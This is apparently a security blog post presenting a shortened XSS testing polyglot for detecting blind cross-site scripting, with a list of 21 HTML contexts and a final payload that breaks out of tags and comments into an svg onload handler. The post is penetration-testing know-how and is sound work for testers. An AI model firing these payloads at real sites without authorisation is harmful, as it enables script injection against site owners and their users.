Blind XSS Detection
I noticed that Gareth Heyes has a sweet one-liner XSS testing polyglot in his twitter profile (@GarethHeyes).
This vector is particularly useful for detecting blind XSS vulnerabilities.
I thought it would be fun to see if I could make it shorter and more effective.
I managed to shorten the length by 10 bytes and surprisingly enough it also works in one more context. This is the one-liner polyglot:
javascript:/*</title></textarea></style --></xmp></script><svg/onload='//"/**/%0a
onmouseover=alert()//'>
It is 103 bytes long and it works in one more context than Gareth's (his doesn't work in single line comment contexts (//), although I find his vector to be more elegant).
I decided to improve it so that it works in every possible context:
<script>xss</script>
<script>a='xss'</script>
<script>a="xss"</script>
<script>a="xss"</script>
<script>//xss</script>
<script>/*xss*/</script>
<a href='xss'></a>
<title>xss</title>
<textarea>xss</textarea>
<style>xss</style>
<div>xss</div>
<div xss></div>
<div class='xss'></div>
<div class="xss"></div>
<div class=xss></div>
<noscript>xss</noscript>
<noembed>xss</noembed>
<!-- xss -->
<xmp>xss</xmp>
<math>xss</math>
<frameset>xss</frameset>
The resulting vector is:
javascript:/*</title></textarea></style --></xmp></script></noembed></noscript></math><svg/onload='//"/**/%0aonmouseover=alert()//'>
Besides for Blind XSS, this vector is also good for optimizing the process of finding regular cross-site scripting vulnerabilities. Instead of having to send 21 requests to each parameter when testing an application, you only have to make 1 request. This gets the job done in approximately only 5% of the time.
Can you make it even shorter? Let me know in the comments or through twitter (@ruben_v_pina)
Filed under: Hacking,Web Application Security,XSS - @ 2023-07-12 23:12
Tags: cross, cross-site scripting, detection, gareth, gareth heyes, heyes, liner, one, one-liner, optimization, polyglot, scripting, site, xss